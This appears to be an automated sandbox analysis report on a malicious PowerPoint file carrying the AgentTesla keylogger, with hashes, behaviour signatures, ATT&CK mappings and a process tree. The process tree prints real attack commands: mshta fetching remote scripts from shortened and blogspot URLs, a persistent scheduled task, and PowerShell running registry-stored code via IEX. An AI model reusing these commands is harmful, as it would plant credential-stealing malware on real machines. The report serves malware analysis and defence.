Overview

overview

10

Static

static

8

25.pps

windows7_x64

10

25.pps

windows10_x64

10

Analysis

  • max time kernel
    86s
  • max time network
    138s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    24-02-2021 18:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    25.pps

  • Size

    143KB

  • MD5

    c475bbc0142c89758cb3f15625f5dee7

  • SHA1

    eea1ff58d1a0b6a471f9a34d97b102c2cd0a3431

  • SHA256

    7df670fa6de80e87fa03dfba84f5777054d5a55737f8fce07679a637342250a3

  • SHA512

    241a3575dd78dcc2b4f20d20a46f53f4910c7e613ba1dba87b5dd7c9aaa4cc5ebf83784c2560e60fee5ad11732cb3a36a445a6cc82ae851e10367fbbdda8ad9f

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • AgentTesla Payload 2 IoCs
  • Blocklisted process makes network request 13 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 2 IoCs
    evasion
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\25.pps" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3300
    • C:\Windows\SYSTEM32\mSHtA.exe
      mSHtA http://12384928198391823%12384928198391823@j.mp/akawasdiaodiasdokwnduhand
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""tutipajikhana"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@mylundisfarbigthenyouthink.blogspot.com/p/19.html""\"", 0 : window.close"\")
        3⤵
        • Creates scheduled task(s)
        PID:1404
      • C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
        "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).cutona)|IEX
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3124
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3304
      • C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe
        "C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe" -noexit ((gp HKCU:\Software).btfee)|IEX
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1472
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2668
      • C:\Windows\System32\taskkill.exe
        "C:\Windows\System32\taskkill.exe" /f /im winword.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1280
      • C:\Windows\system32\WerFault.exe
        C:\Windows\system32\WerFault.exe -u -p 1980 -s 2884
        3⤵
        • Program crash
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2972
    • C:\Windows\SYSTEM32\ping.exe
      ping
      2⤵
      • Process spawned unexpected child process
      • Runs ping.exe
      PID:3852
    • C:\Program Files\Microsoft Office\Root\Office16\winword.exe
      winword
      2⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:3688

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Registry Run Keys / Startup Folder

1
T1060

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Remote System Discovery

1
T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    MD5

    c2d06c11dd1f1a8b1dedc1a311ca8cdc

    SHA1

    75c07243f9cb80a9c7aed2865f9c5192cc920e7e

    SHA256

    91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

    SHA512

    db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

    Download Submit
  • memory/1280-19-0x0000000000000000-mapping.dmp
    Download
  • memory/1404-15-0x0000000000000000-mapping.dmp
    Download
  • memory/1472-53-0x000000000A470000-0x000000000A471000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1472-30-0x0000000006DE2000-0x0000000006DE3000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1472-24-0x0000000004730000-0x0000000004731000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1472-51-0x0000000009C90000-0x0000000009C91000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1472-47-0x0000000009ED0000-0x0000000009ED1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1472-43-0x0000000008380000-0x0000000008381000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1472-57-0x000000000AFF0000-0x000000000AFF1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1472-25-0x0000000007420000-0x0000000007421000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1472-17-0x0000000000000000-mapping.dmp
    Download
  • memory/1472-62-0x000000000A310000-0x000000000A311000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1472-27-0x0000000006DE0000-0x0000000006DE1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1472-22-0x0000000073380000-0x0000000073A6E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/1980-7-0x0000000000000000-mapping.dmp
    Download
  • memory/2668-18-0x0000000000000000-mapping.dmp
    Download
  • memory/2972-20-0x000001F3387C0000-0x000001F3387C1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-33-0x0000000007FC0000-0x0000000007FC1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-49-0x000000000A300000-0x000000000A301000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-21-0x0000000073380000-0x0000000073A6E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/3124-29-0x0000000005132000-0x0000000005133000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-16-0x0000000000000000-mapping.dmp
    Download
  • memory/3124-31-0x0000000007760000-0x0000000007761000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-65-0x000000000A7F0000-0x000000000A803000-memory.dmp
    Filesize

    76KB

    Download
  • memory/3124-35-0x00000000080A0000-0x00000000080A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-37-0x0000000008290000-0x0000000008291000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-39-0x0000000008660000-0x0000000008661000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-41-0x00000000086A0000-0x00000000086A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-63-0x0000000005133000-0x0000000005134000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-45-0x00000000097B0000-0x00000000097B1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3124-28-0x0000000005130000-0x0000000005131000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3300-5-0x00007FF8C6890000-0x00007FF8C6EC7000-memory.dmp
    Filesize

    6.2MB

    Download
  • memory/3300-4-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3300-6-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3300-2-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3300-55-0x00007FF8C46A0000-0x00007FF8C627D000-memory.dmp
    Filesize

    27.9MB

    Download
  • memory/3300-58-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3300-59-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3300-60-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3300-61-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3300-3-0x00007FF8A2B20000-0x00007FF8A2B30000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3304-66-0x0000000000400000-0x000000000043E000-memory.dmp
    Filesize

    248KB

    Download
  • memory/3304-67-0x000000000043828E-mapping.dmp
    Download
  • memory/3304-68-0x0000000073380000-0x0000000073A6E000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/3304-72-0x0000000005840000-0x0000000005841000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3304-73-0x00000000056A0000-0x00000000056A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3304-74-0x00000000057E0000-0x00000000057E1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/3688-14-0x00007FF8C6890000-0x00007FF8C6EC7000-memory.dmp
    Filesize

    6.2MB

    Download
  • memory/3688-9-0x0000000000000000-mapping.dmp
    Download
  • memory/3852-8-0x0000000000000000-mapping.dmp
    Download